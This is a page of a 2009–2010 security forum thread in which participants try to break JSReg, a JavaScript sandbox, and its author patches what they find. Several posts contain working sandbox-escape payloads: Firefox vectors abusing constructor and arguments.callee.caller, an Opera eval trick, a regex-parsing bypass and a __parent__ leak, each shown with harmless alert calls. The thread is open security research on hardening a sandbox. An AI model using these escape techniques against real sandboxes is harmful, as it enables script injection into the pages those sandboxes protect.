Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous1234567891011...LastNext
Current Page: 5 of 13
Re: JSReg sandbox challenge
Posted by: sirdarckcat
Date: October 25, 2009 08:29AM

oh.. now that I think about it.. JSReg wont be able to handle JSON..

{a:[1,2,3]}

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: kangax
Date: October 25, 2009 05:32PM

Isn't negative slice broken in IE?

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: sirdarckcat
Date: October 25, 2009 08:47PM

hmm, if it is, then

Array(0,2).slice(1)

one char less haha

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: October 26, 2009 06:13AM

RE JSON

I think I will integrate a separate JSON parser which will use either the native JSON parser or Crockford's depending which is available

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: kangax
Date: October 26, 2009 11:15AM

@Gareth Are you sure you want to trust native JSON parser? :)

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: October 26, 2009 12:12PM

@kangax

Hehe I don't trust anything, I'd try to validate it first and make sure it's been parsed with JSReg.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: sirdarckcat
Date: November 15, 2009 09:59AM

bug
z=1/1;x="/+/"/i;

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: November 16, 2009 03:03AM

@sirdarckcat

Awesome bug thanks!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 15, 2010 04:53AM

Stefano Di Paola broke JSReg after I challenge everyone on the web app sec list. I've since patched JSReg and remove callee, caller and prototype. I know that removing these features limits the javascript available in the sandbox but I don't care I'd rather secure it then work out how to use the features safely. His vectors are awesome btw.

JSReg now returns strings/objects/regexps as is, it no longer rewrites them. I still match but this results in much faster performance.

check it out:-

Quote

you call, I execute. :)

== Firefox:
6 examples for the same concept: use constructor with nested call
abusing caller to get Function native reference.

1.
try{
throw Error
}catch(e){ e.constructor(
{ toString:function(){alert(arguments.callee.caller("alert(window)")())}} ) }

2.
Error.constructor({toString:function(){arguments.callee.caller("alert(window)")()}});

3.
(2222..toString).constructor({toString:function(){arguments.callee.caller("alert(window)")()}})

4.
({}.toString).constructor({toString:function(){alert(arguments.callee.caller("alert(window)")())}})

5.
(Object).constructor({toString:function(){alert(arguments.callee.caller)}})

6.
ts={toString:function(){arguments.callee.caller.toString=function(){ arguments.callee.caller("alert(window)")()};Function(arguments.callee.caller)}};
ts in [this]

== Opera:
Different concept, this time prototype native objects and rewrite of
toString with a try{}catch(){} block returning always eval until is
executed with the real one.

String.prototype.toString=function(){
try{
return "eval";
}catch(e){}
}
s=new String();
eval(s+"")('document.write("<script>alert(location)</script>")');

Explorer:
Can't find anything cause it sucks :D (Hey MS, joking :P)

It was a pleasure playing around with JSreg.

Keep up good work and cheers!
Stefano

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: kangax
Date: March 16, 2010 11:15AM

I can't break it, but I still see bugs :)

({ toString: 1 }).hasOwnProperty('toString'); // false, should be true
[1,2]['length']; // 1, should be 2

And btw, it also breaks [[Class]]-based type-infererence (not sure if you care about that).

Object.prototype.toString.call(function(){}); // "[object Object]" not "[object Function]"

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 16, 2010 02:39PM

Quote

({ toString: 1 }).hasOwnProperty('toString'); // false, should be true

Great catch thanks!

Quote

[1,2]['length']; // 1, should be 2

This is a limitation of the sandbox syntax. The alternative is :-
Array(1,2)['length']; // should be 2

Quote

Object.prototype.toString.call(function(){});

Yeah this is disabled for now because of Stefano's great attacks. I'm planning to add prototype back when I can make it safe

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/16/2010 02:39PM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: kangax
Date: March 16, 2010 03:24PM

What about:

[].slice.call([1,2,3], 1)[0]; // `undefined`, should be `2`

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 16, 2010 05:03PM

@kangax

Dude array literal is not allowed with JSReg syntax you have to use Array() this is due to JavaScript weak regular expression support for look behind :|


[].slice.call(Array(1,2,3), 1)[0];

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: kangax
Date: March 16, 2010 09:51PM

@Gareth

Gotcha :)

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Anonymous User
Date: March 24, 2010 05:07PM

/[/*]*//1*alert(1)//[^/*]*/

Description:Syntax error
Msg:unterminated regular expression literal
//1*alert(1)//[^/*]*/
Line:-1

small bug in the regex parser (or comment removal? not sure :) )

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 24, 2010 05:38PM

@mario

Nice! Both actually they're interconnected :)

Working on a fix for this and something else I found

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 25, 2010 06:51AM

@mario

Awesome vector it proved very difficult to write a regex to match that

@kangax

The toString hasOwnProperty should be ok now but this has been modified into a safe property. Mario found that valueOf leaked the window because I allowed valueOf properties to allow object literals to use it but this is dangerous and so I disable toString and valueOf.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: kangax
Date: March 25, 2010 08:35AM

@Gareth

Is there a list of things that are NOT part of jsreg — array literals, valueOf, etc.

Also, what happened to `for-in`? Doesn't work again:

var o = { x: 1 };
for (var p in o) alert(p); // alerts "JSREG_ITEM"

Something like this seems to trip parser too:

({})[/\u0027/];

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 25, 2010 08:55AM

@kangax

Yeah sorry I need a FAQ and a group. I'll sort one out with a issues section too.

Quote

var o = { x: 1 };
for (var p in o) alert(p); // alerts "JSREG_ITEM"

I modified the "for in" code because rewriting to while loops to prevent client side DOS was causing errors. At the moment JSReg requires a full block loop like for(var p in o) { alert(p); } this is because I have to match the beginning of the loop and inject $p$=($p$+'').replace(/^[$]/,'').replace(/[$]$/,''); Currently the DOS protection is flawed too it requires some work :(

Quote

({})[/\u0027/];

Extremely nice! This one is because Firefox and maybe others transforms escapes when calling new Function. I use new Function to check syntax before and after converting

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 25, 2010 09:32AM

I've given in to organisation:-
http://code.google.com/p/jsreg/

I'll upload the code here, allow contribs maybe ports and sort out a issues list and wiki.

I'm tracking isssues here:-
http://code.google.com/p/jsreg/issues/list

and a list of wikis here:-
http://code.google.com/p/jsreg/w/list

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/25/2010 10:26AM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: April 29, 2010 06:43AM

Experimental support for Arrays here:-

http://www.businessinfo.co.uk/labs/jsreg/arrays/jsreg.html

Stuff like should all be detected:-
{}[1,2,3]
[1,2,3];[1,2,3]['__parent__']

The only limitation would be object literals as there's no way to detect if they are a block statement or literal.

e.g.
~{'a':123}['__parent__']// will be forced into an array

This should work though:-
o={a:[1,2,3]}

I think JSReg got a little more practical :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: kangax
Date: April 29, 2010 10:07PM

I get error with this: [[1,1][1],[1]]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: April 30, 2010 04:06AM

@kangax

Thanks! Cool. Yeah array detection is tough because even though I can detect the "[" fairly reliably the closing "]" is very difficult because it occurs in the same pattern if an array or object accessor. Oh and detecting everything from "[" inside to "]" is pretty impossible using js regexes

Updated
--------

Fixed it with a bit of a hack, I dunno if this is gonna be possible but I'll persist. I scan backwards up the parse tree to see what has been match to decide if it's a closing array or obj access

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 04/30/2010 04:42AM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: April 30, 2010 04:45AM

AAAAAAAAAAAAAND PWND

1[['__parent__']]

Damn arrays are going :(

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 04, 2010 10:55AM

The Arrays strike back!!!!!

http://www.businessinfo.co.uk/labs/jsreg/arrays/jsreg.html

This time I detect:-
[1,2,3] and convert to A(1,2,3)

Then
a={a:1};a['a']
Converts to:-
$a$={$a$:Number(1)}
$a$.JSREG_ITEM('a')

I'm looking for syntax errors specifically like incorrect detection of object properties like objA(1) which should be obj.JSREG_ITEM(1)

Finally I can sleep a night now that hopefully JSReg will detect arrays

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: kangax
Date: May 04, 2010 06:53PM

Doesn't this return a `window` now? []['toString']()

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 05, 2010 12:57AM

@kangax

Nope the type is "string", so it appears harmless but I'll investigate why it's doing it as before it wasn't

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: kangax
Date: May 05, 2010 08:40AM

How about taking care of trailing commas? `[1,]` gives error but shouldn't.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 05, 2010 08:46AM

@kangax

Great point! Thanks! Any suggestions how I can rewrite it to handle trailing commas?

Thinking about it, the best way would be to simply replace:-

[1,]
with:-
[1]

Update...
and fixed doing exactly that :)
This is getting close to me trusting it. Can anyone break it before I commit?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 05/05/2010 09:08AM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: kangax
Date: May 05, 2010 11:19PM

I don't think it's ready yet...

[{},{}[[]]]; // errors out, but shouldn't

Options: ReplyQuote
Pages: Previous1234567891011...LastNext
Current Page: 5 of 13


Sorry, only registered users may post in this forum.